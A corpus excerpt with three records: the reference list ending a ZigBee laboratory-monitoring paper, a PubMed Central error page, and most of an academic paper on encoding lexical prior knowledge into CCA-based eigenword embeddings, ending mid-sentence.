in the laboratory to alert the abnormal situation in time to avoid the economic loss caused by aging equipment or human negligence. The development of such a system has a positive effect on the laboratory construction of colleges and universities, and has certain application prospects. REFERENCES [1] ZHANG Hui YUAN Yong-zhe WANG Wen-jun “Security and intelligent system for buses based on mobile internet of things “Electronic Design Engineering. 2020, 28(9) 37-40. [2] SUN Qi-bo LIU Jie LI Shan FAN Chun-xiao SUN Juan-juan” Internet of Things:Summarize on Concepts,Architecture and Key Technology Problem” JOURNAL OF BEIJING UNIVERSITY OF POSTS AND TELECOMMUNICATIONS. 2010, 33(3).1-2. [3] LIU Qiang CUI Li CHEN Hai-ming “Key Technologies and Applications of Internet of Things” COMPUTER SCIENCE. 2010, 37(6).1-4. [4] HAN Tuanjun YIN Jiwu ZHANG Panfei ZHENG Xu ZHENG Zhengbing.” Design of remote laboratory safety management system based on GPRS and Zigbee” Experimental Technology and Management. 2019, 36(11) 240-244. [5] YAN Yaling LI Bo LIU Weijie.” ZigBee-based Laboratory Fireproof Remote Monitoring System”. 2019, 38(5) 282-285. [6] Jiang Yunchen.” Monitoring and managing system of laboratory based on campus LAN and ZigBee technology” EXPERIMENTAL TECHNOLOGY AND MANAGEMENT. 2010, 27(7).104-106. [7] FAN Yan YU Yang LI Yong-yi DING Yi-xing “Research on Remote Monitoring System Based on ZigBee Wireless Sensor Network” Research and Exploration in Laboratory. 2016, 35(1).80-84. [8] ZHANG Pan HUO Lian-song “Design of An Wireless Temperature Monitoring System Based on ZigBee” Sensor World. 2018, 24(8).23-27. [9] WANG Sihua ZHENG Shuqiang DING Yihua “Discussion on ZigBee Sensor Network Technology and Its Application” Radio Engineering. 2020, 50(5).415-417. work_6ljoda22qrewffngplu5frxzny ---- wp-p1m-38.ebi.ac.uk Params is empty 404 sys_1000 exception wp-p1m-38.ebi.ac.uk no 265376061 Params is empty 265376061 exception Params is empty 2021/04/06-17:58:27 if (typeof jQuery === "undefined") document.write('[script type="text/javascript" src="/corehtml/pmc/jig/1.14.8/js/jig.min.js"][/script]'.replace(/\[/g,String.fromCharCode(60)).replace(/\]/g,String.fromCharCode(62))); // // // window.name="mainwindow"; .pmc-wm {background:transparent repeat-y top left;background-image:url(/corehtml/pmc/pmcgifs/wm-nobrand.png);background-size: auto, contain} .print-view{display:block} Page not available Reason: The web page address (URL) that you used may be incorrect. Message ID: 265376061 (wp-p1m-38.ebi.ac.uk) Time: 2021/04/06 17:58:27 If you need further help, please send an email to PMC. Include the information from the box above in your message. Otherwise, click on one of the following links to continue using PMC: Search the complete PMC archive. Browse the contents of a specific journal in PMC. Find a specific article by its citation (journal, date, volume, first page, author or article title). http://europepmc.org/abstract/MED/ work_6lltcw7mj5effmke754i7v26s4 ---- Encoding Prior Knowledge with Eigenword Embeddings Dominique Osborne Department of Mathematics and Statistics University of Strathclyde Glasgow, G1 1XH, UK dominique.osborne.13@uni.strath.ac.uk Shashi Narayan and Shay B. Cohen School of Informatics University of Edinburgh Edinburgh, EH8 9LE, UK {snaraya2,scohen}@inf.ed.ac.uk Abstract Canonical correlation analysis (CCA) is a method for reducing the dimension of data represented using two views. It has been previously used to derive word embeddings, where one view indicates a word, and the other view indicates its context. We describe a way to incorporate prior knowledge into CCA, give a theoretical justification for it, and test it by deriving word embeddings and evaluating them on a myriad of datasets. 1 Introduction In recent years there has been an immense in- terest in representing words as low-dimensional continuous real-vectors, namely word embeddings. Word embeddings aim to capture lexico-semantic information such that regularities in the vocabulary are topologically represented in a Euclidean space. Such word embeddings have achieved state-of-the- art performance on many natural language process- ing (NLP) tasks, e.g., syntactic parsing (Socher et al., 2013), word or phrase similarity (Mikolov et al., 2013b), dependency parsing (Bansal et al., 2014), unsupervised learning (Parikh et al., 2014) and oth- ers. Since the discovery that word embeddings are useful as features for various NLP tasks, research on word embeddings has taken on a life of its own, with a vibrant community searching for better word rep- resentations in a variety of problems and datasets. These word embeddings are often induced from large raw text capturing distributional co-occurrence information via neural networks (Bengio et al., 2003; Mikolov et al., 2013b; Mikolov et al., 2013c) or spectral methods (Deerwester et al., 1990; Dhillon et al., 2015). While these general pur- pose word embeddings have achieved significant im- provement in various tasks in NLP, it has been dis- covered that further tuning of these continuous word representations for specific tasks improves their per- formance by a larger margin. For example, in de- pendency parsing, word embeddings could be tai- lored to capture similarity in terms of context within syntactic parses (Bansal et al., 2014) or they could be refined using semantic lexicons such as WordNet (Miller, 1995), FrameNet (Baker et al., 1998) and the Paraphrase Database (Ganitkevitch et al., 2013) to improve various similarity tasks (Yu and Dredze, 2014; Faruqui et al., 2015; Rothe and Schütze, 2015). This paper proposes a method to encode prior semantic knowledge in spectral word embeddings (Dhillon et al., 2015). Spectral learning algorithms are of great inter- est for their speed, scalability, theoretical guaran- tees and performance in various NLP applications. These algorithms are no strangers to word embed- dings either. In latent semantic analysis (LSA, (Deerwester et al., 1990; Landauer et al., 1998)), word embeddings are learned by performing SVD on the word by document matrix. Recently, Dhillon et al. (2015) have proposed to use canonical cor- relation analysis (CCA) as a method to learn low- dimensional real vectors, called Eigenwords. Un- like LSA based methods, CCA based methods are scale invariant and can capture multiview informa- tion such as the left and right contexts of the words. As a result, the eigenword embeddings of Dhillon et al. (2015) that were learned using the simple lin- ear methods give accuracies comparable to or better than state of the art when compared with highly non- linear deep learning based approaches (Collobert and Weston, 2008; Mnih and Hinton, 2007; Mikolov et al., 2013b; Mikolov et al., 2013c). The main contribution of this paper is a technique 417 Transactions of the Association for Computational Linguistics, vol. 4, pp. 417–430, 2016. Action Editor: Hal Daume III. Submission batch: 3/2016; Published 7/2016. c©2016 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. to incorporate prior knowledge into the derivation of canonical correlation analysis. In contrast to previ- ous work where prior knowledge is introduced in the off-the-shelf embeddings as a post-processing step (Faruqui et al., 2015; Rothe and Schütze, 2015), our approach introduces prior knowledge in the CCA derivation itself. In this way it preserves the the- oretical properties of spectral learning algorithms for learning word embeddings. The prior knowl- edge is based on lexical resources such as WordNet, FrameNet and the Paraphrase Database. Our derivation of CCA to incorporate prior knowledge is not limited to eigenwords and can be used with CCA for other problems. It follows a sim- ilar idea to the one proposed by Koren and Carmel (2003) for improving the visualization of principal vectors with principal component analysis (PCA). Our derivation represents the solution to CCA as that of an optimization problem which maximizes the distance between the two view projections of training examples, while weighting these distances using the external source of prior knowledge. As such, our approach applies to other uses of CCA in the NLP literature, such as the one of Jagarlamudi and Daumé (2012), who used CCA for translitera- tion, or the one of Silberer et al. (2013), who used CCA for semantically representing visual attributes. 2 Background and Notation For an integer n, we denote by [n] the set of integers {1, . . . ,n}. We assume the existence of a vocabu- lary of words, usually taken from a corpus. This set of words is denoted by H = {h1, . . . ,h|H|}. For a square matrix A, we denote by diag(A) a diagonal matrix B which has the same dimensions as A such that Bii = Aii for all i. For vector v ∈ Rd, we de- note its `2 norm by ||v||, i.e. ||v|| = √∑d i=1 v 2 i . We also denote by vj or [v]j the jth coordinate of v. For a pair of vectors u and v, we denote their dot product by 〈u,v〉. We define a word embedding as a function f from H to Rm for some (relatively small) m. For exam- ple, in our experiments we vary m between 50 and 300. The word embedding function maps the word to some real-vector representation, with the inten- tion to capture regularities in the vocabulary that are topologically represented in the corresponding Eu- clidean space. For example, all vocabulary words that correspond to city names could be grouped to- gether in that space. Research on the derivation of word embeddings that capture various regularities has greatly accel- erated in recent years. Various methods used for this purpose range from low-rank approximations of co-occurrence statistics (Deerwester et al., 1990; Dhillon et al., 2015) to neural networks jointly learn- ing a language model (Bengio et al., 2003; Mikolov et al., 2013a) or models for other NLP tasks (Col- lobert and Weston, 2008). 3 Canonical Correlation Analysis for Deriving Word Embeddings One recent approach to derive word embeddings, developed by Dhillon et al. (2015), is through the use of canonical correlation analysis, resulting in so- called “eigenwords.” CCA is a technique for multi- view dimensionality reduction. It assumes the ex- istence of two views for a set of data, similarly to co-training (Yarowsky, 1995; Blum and Mitchell, 1998), and then projects the data in the two views in a way that maximizes the correlation between the projected views. Dhillon et al. (2015) used CCA to derive word embeddings through the following procedure. They first break each document in a corpus of documents into n sequences of words of a fixed length 2k + 1, where k is a window size. For example, if k = 2, the short document “Harry Potter has been a best- seller” would be broken into “Harry Potter has been a” and “Potter has been a best-seller.” In each such sequence, the middle word is identified as a pivot. This leads to the construction of the fol- lowing training set from a set of documents: {(w(i)1 , . . . ,w (i) k ,w (i),w (i) k+1, . . . ,w (i) 2k ) | i ∈ [n]}. With abuse of notation, this is a multiset, as cer- tain words are expected to appear in certain contexts multiple times. Each w(i) is a pivot word, and the rest of the elements are words in the sequence called “the context words.” With this training set in mind, the two views for CCA are defined as following. We define the first view through a sparse “context matrix” C ∈ Rn×2k|H| such that each row in the matrix is a vector, consisting of 2k one-hot vectors, each of length |H|. Each such one-hot vector corre- 418 |H| 1 2 i n W 1 0 2 0 0 0 j w(i) = hj 1 0 0 |H| 0 1 2 i n 1 k 2k C 1 0 2 0 0 0 j w (i) k = hj 1 0 0 |H| 0 Figure 1: The word and context views represented as ma- trix W and C. Each row in W is a vector of length |H|, corresponding to a one-hot vector for the word in the ex- ample indexed by the row. Each row in C is a vector of length 2k|H|, divided into sub-vectors each of length |H|. Each such sub-vector is a one-hot vector for one of the 2k context words in the example indexed by the row. sponds to a word that fired in a specific index in the context. In addition, we also define a second view through a matrix W ∈ Rn×|H| such that Wij = 1 if w(i) = hj. We present both views of the training set in Figure 1. Note that now the matrix M = W>C is in R|H|×(2k|H|) such that each element Mij gives the count of times that hi appeared with the correspond- ing context word and context index encoded by j. Similarly, we define a matrix D1 = diag(W>W) and D2 = diag(C>C). Finally, to get the word em- beddings, we perform singular value decomposition (SVD) on the matrix D−1/21 MD −1/2 2 . Note that in its original form, CCA requires use of W>W and C>C in their full form, and not just the correspond- ing diagonal matrices D1 and D2; however, in prac- tice, inverting these matrices can be quite intensive computationally and can lead to memory issues. As such, we approximate CCA by using the diagonal matrices D1 and D2. From the SVD step, we get two projections U ∈ R|H|×m and V ∈ R2k|H|×m such that D −1/2 1 MD −1/2 2 ≈ UΣV > where Σ ∈ Rm×m is a diagonal matrix with Σii > 0 being the ith largest singular value of D −1/2 1 MD −1/2 2 . In order to get the final word em- beddings, we calculate D−1/21 U ∈ R|H|×m. Each row in this matrix corresponds to an m-dimensional vector for the corresponding word in the vocabulary. This means that f(hi) for hi ∈ H is the ith row of the matrix D−1/21 U. The projection V can be used to get “context embeddings.” See more about this in Dhillon et al. (2015). This use of CCA to derive word embeddings follows the usual distributional hypothesis (Harris, 1957) that most word embeddings techniques rely on. In the case of CCA, this hypothesis is trans- lated into action in the following way. CCA finds projections for the contexts and for the pivot words which are most correlated. This means that if a word co-occurs in a specific context many times (either directly, or transitively through similarity to other words), then this context is expected to be projected to a point “close” to the point to which the word is projected. As such, if two words occur in a specific context many times, these two words are expected to be projected to points which are close to each other. For the next section, we denote X = WD−1/21 and Y = CD−1/22 . To refer to the dimensions of X and Y generically, we denote d = |H| and d′ = 2k|H|. In addition, we refer to the column vectors of U and V as u1, . . . ,um and v1, . . . ,vm. Mathematical Intuition Behind CCA The pro- cedure that CCA follows finds a projection of the two views in a shared space, such that the correla- tion between the two views is maximized at each co- ordinate, and there is minimal redundancy between the coordinates of each view. This means that CCA solves the following sequence of optimization prob- lems for j ∈ [m] where aj ∈ R1×d and bj ∈ R1×d ′ : arg max aj,bj corr(ajW >,bjC >) such that corr(ajW >,akW >) = 0, k < j corr(bjC >,bkC >) = 0, k < j 419 where corr is a function that accepts two vectors and return the Pearson correlation between the pair- wise elements of the two vectors. The approxi- mate solution to this optimization problem (when using diagonal D1 and D2) is â>i = D −1/2 1 ui and b̂>i = D −1/2 2 vi for i ∈ [m]. CCA also has a probabilistic interpretation as a maximum likelihood solution of a latent variable model for two normal random vectors, each drawn based on a third latent Gaussian vector (Bach and Jordan, 2005). The way we describe CCA for deriving word embeddings is related to Latent Semantic Indexing (LSI), which performs singular value decomposition on the matrix M directly, without doing any kind of variance normalization. Dhillon et al. (2015) de- scribe some differences between LSI and CCA. The extra normalization step decreases the importance of frequent words when doing SVD. 4 Incorporating Prior Knowledge into Canonical Correlation Analysis In this section, we detail the technique we use to incorporate prior knowledge into the derivation of canonical correlation analysis. The main motiva- tion behind our approach is to improve the opti- mization of correlation between the two views by weighing them using the external source of prior knowledge. The prior knowledge is based on lex- ical resources such as WordNet, FrameNet and the Paraphrase Database. Our approach follows a sim- ilar idea to the one proposed by Koren and Carmel (2003) for improving the visualization of principal vectors with principal component analysis (PCA). It is also related to Laplacian manifold regularization (Belkin et al., 2006). An important notion in our derivation is that of a Laplacian matrix. The Laplacian of an undirected weighted graph is an n × n matrix where n is the number of nodes in the graph. It equals D−A where A is the adjacency matrix of the graph (so that Aij is the weight for the edge (i,j) in the graph, if it exists, and 0 otherwise) and D is a diagonal matrix such that Dii = ∑ j Aij. The Laplacian is always a sym- metric square matrix such that the sum over rows (or columns) is 0. It is also positive semi-definite. We propose a generalization of CCA, in which we introduce a Laplacian matrix into the derivation of CCA itself, as shown in Figure 2. We encode prior knowledge about the distances between the projec- tions of two views into the Laplacian. The Laplacian allows us to improve the optimization of the correla- tion between the two views by weighing them using the external source of prior knowledge. 4.1 Generalization of CCA We present three lemmas (proofs are given in Ap- pendix A), followed by our main proposition. These three lemmas are useful to prove our final proposi- tion. The main proposition shows that CCA maximizes the distance between the two view projections for any pair of examples i and j, i 6= j, while mini- mizing the two view projection distance for the two views of an example i. The two views we discuss here in practice are the view of the word through a one-hot representation, and the view which repre- sents the context words for a specific word token. The distance between two view projections is de- fined in Eq. 2. Lemma 1. Let X and Y be two matrices of size n×d and n × d′, respectively, for example, as defined in §3. Assume that ∑n i=1 Xij = 0 for j ∈ [d] and∑n i=1 Yij = 0 for j ∈ [d′]. Let L be an n × n Laplacian matrix such that Lij = { n− 1 if i = j −1 if i 6= j. (1) Then X>LY equals X>Y up to a multiplication by a positive constant. Lemma 2. Let A ∈ Rd×d′ . Then the rank m thin- SVD of A can be found by solving the following op- timization problem: max u1, . . . ,um, v1, . . . ,vm m∑ i=1 u>i Avi such that ||ui|| = ||vi|| = 1 i ∈ [m] 〈ui,uj〉 = 〈vi,vj〉 = 0 i 6= j where ui ∈ Rd×1 denote the left singular vectors, and vi ∈ Rd ′×1 denote the right singular vectors. 420 d n W n n L prior knowledge (optional) d′ n C diag W>W −1 2 D1 × W> × C × M diag C>C −1 2 D2 ≈ m d U × Σ × d′ mV > X> Y Figure 2: Introducing prior knowledge in CCA. W ∈ Rn×d and C ∈ Rn×d′ denote the word and context views respectively. L ∈ Rn×n is a Laplacian matrix encoded with the prior knowledge about the distances between the projections of W and C. The last utility lemma we describe shows that in- terjecting the Laplacian between the two views can be expressed as a weighted sum of the distances be- tween the projections of the two views (these dis- tances are given in Eq. 2), where the weights come from the Laplacian. Lemma 3. Let u1, . . . ,um and v1, . . . ,vm be two sets of vectors of length d and d′ respectively. Let L ∈ Rn×n be a Laplacian and X ∈ Rn×d and Y ∈ Rn×d ′ . Then: m∑ k=1 (Xuk) >L (Y vk) = ∑ i,j −Lij ( dmij )2 , where dmij = √√√√1 2 ( m∑ k=1 ([Xuk]i − [Y vk]j)2 ) . (2) The following proposition is our main result for this section. Proposition 4. The matrices U ∈ Rd×m and V ∈ Rd ′×m that CCA computes are the m-dimensional projections that maximize ∑ i,j ( dmij )2 −n n∑ i=1 (dmii ) 2 , (3) where dmij is defined as in Eq. 2 for u1, . . . ,um being the columns of U and v1, . . . ,vm being the columns of V . Proof. According to Lemma 3, the objective in Eq. 3 equals ∑m k=1(Xuk) >L(Y vk) where L is defined as in Eq. 1. Therefore, maximizing Eq. 3 corresponds to maximization of ∑m k=1(Xuk) >L(Y vk) under the constraints that the U and V matrices have orthonor- mal vectors. Using Lemma 2, it can be shown that the solution to this maximization is done by doing singular value decomposition on X>LY . Accord- ing to Lemma 1, this corresponds to finding U and V by doing singular value decomposition on X>Y , because a multiplicative constant does not change the value of the right/left singular vectors. The above proposition shows that CCA tries to find projections of both views such that the distances between the two views for pairs of examples with in- dices i 6= j are maximized (first term in Eq. 3), while 421 minimizing the distance between the projections of the two views for a specific example (second term in Eq. 3). Therefore, CCA tries to project a context and a word in that context to points that are close to each other in a shared space, while maximizing the distance between a context and a word which do not often co-occur together. As long as L is a Laplacian, Proposition 4 is still true, only with the maximization of the objective ∑ i,j −Lij ( dmij )2 , (4) where Lij ≤ 0 for i 6= j and Lii ≥ 0. This result lends itself to a generalization of CCA, in which we use predefined weights for the Laplacian that encode some prior knowledge about the distances that the projections of two views should satisfy. If the weight −Lij is large for a specific (i,j), then we will try harder to maximize the distance be- tween one view of example i and the other view of example j (i.e. we will try to project the word w(i) and the context of example j into distant points in the space). This means that in the current formulation, −Lij plays the role of a dissimiliarity indicator between pairs of words. The more dissimilar words are, the larger the weight, and then the more distant the pro- jections are for the contexts and the words. 4.2 From CCA with Dissimilarities to CCA with Similarities It is often more convenient to work with similarity measures between pairs of words. To do that, we can retain the same formulation as before with the Laplacian, where −Lij now denotes a measure of similarity. Now, instead of maximizing the objective in Eq. 4, we are required to minimize it. It can be shown that such mirror formulation can be done with an algorithm similar to CCA, leading to a proposition in the style of Proposition 4. To solve this minimization formulation, we just need to choose the singular vectors associated with the smallest m singular values (instead of the largest). Once we change the CCA algorithm with the Laplacian to choose these projections, we can de- fine L, for example, based on a similarity graph. The graph is an undirected graph that has |H| nodes, for Inputs: Set of examples {(w(i)1 , . . . ,w (i) k ,w (i),w (i) k+1, . . . ,w (i) 2k ) | i ∈ [n]}, an integer m, an α ∈ (0, 1], an undirected graph G over H, an integer N. Data structures: A matrix M of size |H|× (2k|H|) (cross-covariance matrix), a matrix U corresponding to the word embed- dings Algorithm: (Cross-covariance estimation) ∀i,j ∈ [n] such that |i− j| ≤ N • If i = j, increase Mrs by 1 for r denoting the in- dex of word w(i) and for all s denoting the context indices of words w(i)1 , . . . ,w (i) k and w (i) k+1, . . . ,w (i) 2k . • If i 6= j and word w(i) is connected to word w(j) in G, increase Mrs by α for r denoting the index of word w(i) and for all s denoting the context indices of words w(j)1 , . . . ,w (j) k and w (j) k+1, . . . ,w (j) 2k . • Calculate D1 and D2 as specified in §3. (Singular value decomposition step) • Perform singular value decomposition on D −1/2 1 MD −1/2 2 to get a matrix U ∈ R|H|×m. (Word embedding projection) • For each word hi for i ∈ [|H|] return the word em- bedding that corresponds with the ith row of U. Figure 3: The CCA-like algorithm that returns word em- beddings with prior knowledge encoded based on a simi- larity graph. each word in the vocabulary, and there is an edge be- tween a pair of words whenever the two words are similar to each other based on some external source of information, such as WordNet (for example, if they are synonyms). We then define the Laplacian L such that Lij = −1 if i and j are adjacent in the graph (and i 6= j), Lii is the degree of the node i and Lij = 0 in all other cases. By using this variant of CCA, we strive to maximize the distance of the two views between words which are adjacent in the graph (or continuing the example above, maximize the distance between words which are not synonyms). In addition, the fewer adjacent nodes a word has (or the more syn- onyms it has), the less important it is to minimize the distance between the two views of that given word. 422 4.3 Final Algorithm In order to use an arbitrary Laplacian matrix with CCA, we require that the data is centered, i.e. that the average over all examples of each of the coordi- nates of the word and context vectors is 0. However, such a prerequisite would make the matrices C and W dense (with many non-zero values), and hard to maintain in memory, and would also make singular value decomposition inefficient. As such, we do not center the data to keep it sparse, and as such, use a matrix L which is not strictly a Laplacian, but that behaves better in prac- tice.1 Given the graph mentioned in §4 which is ex- tracted from an external source of information, we use L such that Lij = α for an α ∈ (0, 1) which is treated as a smoothing factor for the graph (see below the choices of α) if i and j are not adjacent in the graph, Lij = 0 if i 6= j are adjacent, and finally Lii = 1 for all i ∈ [n]. Therefore, this ma- trix is symmetric, and the only constraint it does not satisfy is that of rows and columns summing to 0. Scanning the documents and calculating the statistic matrix with the Laplacian is computation- ally infeasible with a large number of tokens given as input. It is quadratic in that number. As such, we make another modification to the algorithm, and calculate a “local” Laplacian. The modification re- quires an integer N as input (we use N = 12), and then it makes updates to pairs of word tokens only if they are within an N-sized window of each. The final algorithm we use is described in Figure 3. The algorithm works by directly computing the co- occurrence matrix M (instead of maintaining W and C). It does so by increasing by 1 any cells corre- sponding to word-context co-occurrence in the doc- uments and by α any cells corresponding to word and contexts that are connected in the graph. 5 Experiments In this section we describe our experiments. 5.1 Experimental Setup Training Data We used three datasets, WIKI1, WIKI2 and WIKI5, all based on the first 1, 2 and 1We note that other decompositions, such as PCA, also re- quire centering of the data, but in case of sparse data matrix, this step is not performed. 5 billion words from Wikipedia respectively.2 Each dataset is broken into chunks of length 13 (window sizes of 6), corresponding to a document. The above Laplacian L is calculated within each document sep- arately. This means that −Lij is 1 only if i and j denote two words that appear in the same document. This is done to make the calculations computation- ally feasible. We calculate word embeddings for the top most frequent 200K words. Prior Knowledge Resources We consider three sources of prior knowledge: WordNet (Miller, 1995), the Paraphrase Database of Ganitkevitch et al. (2013), abbreviated as PPDB,3 and FrameNet (Baker et al., 1998). Since FrameNet and WordNet index words in their base form, we use WordNet’s stemmer to identify the base form for the text in our corpora whenever we calculate the Laplacian graph. For WordNet, we have an edge in the graph if one word is a synonym, hypernym or hyponym of the other. For PPDB, we have an edge if one word is a paraphrase of the other, according to the database. For FrameNet, we connect two words in the graph if they appear in the same frame. System Implementation We modified the imple- mentation of the SWELL Java package4 of Dhillon et al. (2015). Specifically, we needed to modify the loop that iterates over words in each document to a nested loop that iterates over pairs of words, in or- der to compute a sum of the form ∑ ij XriLijYjs. 5 Dhillon et al. (2015) use window size k = 2, which we retain in our experiments.6 5.2 Baselines Off-the-shelf Word Embeddings We compare our word embeddings with existing state-of-the- 2We downloaded the data from https://dumps. wikimedia.org/, and preprocessed it using the tool avail- able at http://mattmahoney.net/dc/textdata. html. 3We use the XL subset of the PPDB. 4https://github.com/paramveerdhillon/ swell. 5Our implementation and the word embeddings that we calculated are available at http://cohort.inf.ed.ac. uk/cohort/eigen/. 6We also use the square-root transformation as mentioned in Dhillon et al. (2015) which controls the variance in the counts accumulated from the corpus. See a justification for this trans- form in Stratos et al. (2015). 423 A B C D E F G H I Word similarity average Geographic analogies NP bracketing NPK WN PD FN NPK WN PD FN NPK WN PD FN R et ro fi tt in g Glove 59.7 63.1 64.6 57.5 94.8 75.3 80.4 94.8 78.1 79.5 79.4 78.7 Skip-Gram 64.1 65.5 68.6 62.3 87.3 72.3 70.5 87.7 79.9 80.4 81.5 80.5 Global Context 44.4 50.0 50.4 47.3 7.3 4.5 18.2 7.3 79.4 79.1 80.5 80.2 Multilingual 62.3 66.9 68.2 62.8 70.7 46.2 53.7 72.7 81.9 81.8 82.7 82.0 Eigen (CCA) 59.5 62.2 63.6 61.4 89.9 79.2 73.5 89.9 81.3 81.7 81.2 80.7 C C A P ri or α = 0.1 - 59.1 59.6 59.5 - 88.9 88.7 89.9 - 81.0 82.4 81.0 α = 0.2 - 59.9 60.6 60.0 - 89.1 91.3 90.1 - 81.0 81.3 80.7 α = 0.5 - 59.9 59.7 59.6 - 86.9 89.3 89.3 - 81.8 81.4 80.9 α = 0.7 - 60.7 59.3 59.5 - 86.9 89.3 92.9 - 80.3 81.2 80.8 α = 0.9 - 60.6 59.6 58.9 - 89.1 93.2 92.5 - 81.3 80.7 81.0 C C A P ri or + R F α = 0.1 - 61.9 63.6 61.5 - 76.0 71.9 89.9 - 81.4 81.7 81.2 α = 0.2 - 62.6 64.9 61.6 - 78.0 69.3 90.1 - 81.7 81.1 80.6 α = 0.5 - 62.7 63.7 61.4 - 74.9 67.3 92.9 - 81.9 81.4 80.0 α = 0.7 - 63.3 63.0 61.0 - 77.4 65.6 90.3 - 81.0 80.8 80.4 α = 0.9 - 62.0 63.3 60.4 - 77.3 66.2 92.5 - 81.0 80.7 80.4 Table 1: Results for the word similarity datasets, geographic analogies and NP bracketing. The first upper blocks (A–C) present the results with retrofitting. NPK stands for no prior knowledge (no retrofitting is used), WN for WordNet, PD for PPDB and FN for FrameNet. Glove, Skip-Gram, Global Context, Multilingual and Eigen are the word embeddings of Pennington et al. (2014), Mikolov et al. (2013b), Huang et al. (2012), Faruqui and Dyer (2014) and Dhillon et al. (2015) respectively. The second middle blocks (D–F) show the results of our eigenword embeddings encoded with prior knowledge using our method. Each row in the block corresponds to a specific use of an α value (smoothing factor), as described in Figure 3. In the lower blocks (G–I) we take the word embeddings from the second block, and retrofit them using the method of Faruqui et al. (2015). Best results in each block are in bold. art word embeddings, such as Glove (Pennington et al., 2014), Skip-Gram (Mikolov et al., 2013b), Global Context (Huang et al., 2012) and Multilin- gual (Faruqui and Dyer, 2014). We also compare our word embeddings with the Eigen word embeddings of Dhillon et al. (2015) without any prior knowl- edge. Retrofitting for Prior Knowledge We compare our approach of incorporating prior knowledge into the derivation of CCA against the previous works where prior knowledge is introduced in the off-the- shelf embeddings as a post-processing step (Faruqui et al., 2015; Rothe and Schütze, 2015). In this pa- per, we focus on the retrofitting approach of Faruqui et al. (2015). Retrofitting works by optimizing an objective function which has two terms: one that tries to keep the distance between the word vectors close to the original distances, and the other which enforces the vectors of words which are adjacent in the prior knowledge graph to be close to each other in the new embedding space. We use the retrofitting package7 to compare our results in different settings against the results of retrofitting of Faruqui et al. (2015). 5.3 Evaluation Benchmarks We evaluated the quality of our eigenword embed- dings on three different tasks: word similarity, geo- graphic analogies and NP bracketing. Word Similarity For the word similarity task we experimented with 11 different widely used bench- marks. The WS-353-ALL dataset (Finkelstein et al., 2002) consists of 353 pairs of English words with their human similarity ratings. Later, Agirre et al. (2009) re-annotated WS-353-ALL for similarity (WS-353-SIM) and relatedness (WS-353-REL) with specific distinctions between them. The SimLex- 999 dataset (Hill et al., 2015) was built to measure how well models capture similarity, rather than relat- edness or association. The MEN-TR-3000 dataset (Bruni et al., 2014) consists of 3000 word pairs 7https://github.com/mfaruqui/ retrofitting. 424 sampled from words that occur at least 700 times in a large web corpus. The datasets, MTurk-287 (Radinsky et al., 2011) and MTurk-771 (Halawi et al., 2012), were scored by Amazon Mechanical Turk workers for relatedness of English word pairs. The YP-130 (Yang and Powers, 2005) and Verb-143 (Baker et al., 2014) datasets were developed for verb similarity predictions. The last two datasets, MC-30 (Miller and Charles, 1991) and RG-65 (Rubenstein and Goodenough, 1965) consist of 30 and 65 noun pairs respectively. For each dataset, we calculate the cosine similar- ity between the vectors of word pairs and measure Spearman’s rank correlation coefficient between the scores produced by the embeddings and human rat- ings. We report the average of the correlations on all 11 datasets. Each word similarity task in the above list represents a different aspect of word similarity, and as such, averaging the results points to the qual- ity of the word embeddings on several tasks. We later analyze specific datasets. Geographic Analogies Mikolov et al. (2013c) created a test set of analogous word pairs such as a:b c:d raising the analogy question of the form “a is to b as c is to ” where d is unknown. We report results on a subset of this dataset which focuses on finding capitals of common countries, e.g., Greece is to Athens as Iraq is to . This dataset consists of 506 word pairs. For given word pairs, a:b c:d where d is unknown, we use the vector offset method (Mikolov et al., 2013b), i.e., we compute a vector v = vb − va + vc where va, vb and vc are vector representations of the words a, b and c respectively; we then return the word d with the greatest cosine similarity to v. NP Bracketing Here the goal is to identify the correct bracketing of a three-word noun (Lazaridou et al., 2013). For example, the bracketing of annual (price growth) is “right,” while the bracketing of (en- try level) machine is “left.” Similarly to Faruqui and Dyer (2015), we concatenate the word vectors of the three words, and use this vector for binary classifi- cation into left or right. Since most of the datasets that we evaluate on in this paper are not standardly separated into develop- ment and test sets, we report all results we calculated (with respect to hyperparameter differences) and do not select just a subset of the results. 5.4 Evaluation Preliminary Experiments In our first set of ex- periments, we vary the dimension of the word em- bedding vectors. We try m ∈ {50, 100, 200, 300}. Our experiments showed that the results consistently improve when the dimension increases for all the different datasets. For example, for m = 50 and WIKI1, we get an average of 46.4 on the word sim- ilarity tasks, 50.1 for m = 100, 53.4 for m = 200 and 54.2 for m = 300. The more data are available, the more likely larger dimension will improve the quality of the word embeddings. Indeed, for WIKI5, we get an average of 49.4, 54.9, 57.0 and 59.5 for each of the dimensions. The improvements with re- spect to the dimension are consistent across all of our results, so we fix m at 300. We also noticed a consistent improvement in ac- curacy when using more data from Wikipedia. For example, for m = 300, using WIKI1 gives an av- erage of 54.1, while using WIKI2 gives an average of 54.9 and finally, using WIKI5 gives an average of 59.5. We fix the dataset we use to be WIKI5. Results Table 1 describes the results from our first set of experiments. (Note that the table is divided into 9 distinct blocks, labeled A through I.) In gen- eral, adding prior knowledge to eigenword embed- dings does improve the quality of word vectors for the word similarity, geographic analogies and NP bracketing tasks on several occasions (blocks D–F compared to last row in blocks A–C). For example, our eigenword vectors encoded with prior knowl- edge (CCAPrior) consistently perform better than the eigenword vectors that do not have any prior knowledge for the word similarity task (59.5, Eigen in the first row under NPK column, versus block D). The only exceptions are for α = 0.1 with Word- Net (59.1), for α = 0.7 with PPDB (59.3) and for α = 0.9 with FrameNet (58.9), where α denotes the smoothing factor. In several cases, running the retrofitting algorithm of Faruqui et al. (2015) on top of our word embed- dings helps further, as if “adding prior knowledge twice is better than once.” Results for these word embeddings (CCAPrior+RF) are shown in Table 1. Adding retrofitting to our encoding of prior knowl- 425 edge often performs better for word similarity and NP bracketing tasks (block D versus G and block F versus I). Interestingly, CCAPrior+RF embeddings also often perform better than eigenword vectors (Eigen) of Dhillon et al. (2015) when retrofitted using the method of Faruqui et al. (2015). For example, in the word similarity task, eigenwords retrofitted with WordNet get an accuracy of 62.2 whereas encoding prior knowledge using both CCA and retrofitting gets a maximum accuracy of 63.3. We see the same pattern for PPDB, with 63.6 for “Eigen” and 64.9 for “CCAPrior+RF”. We hypoth- esize that the reason for these changes is that the two methods for encoding prior knowledge maxi- mize different objective functions. The performance with FrameNet is weaker, in some cases leading to worse performance (e.g., with Glove and SG vectors). We believe that FrameNet does not perform as well as the other lexicons be- cause it groups words based on very abstract con- cepts; often words with seemingly distantly related meanings (e.g., push and growth) can evoke the same frame. This also supports the findings of Faruqui et al. (2015), who noticed that 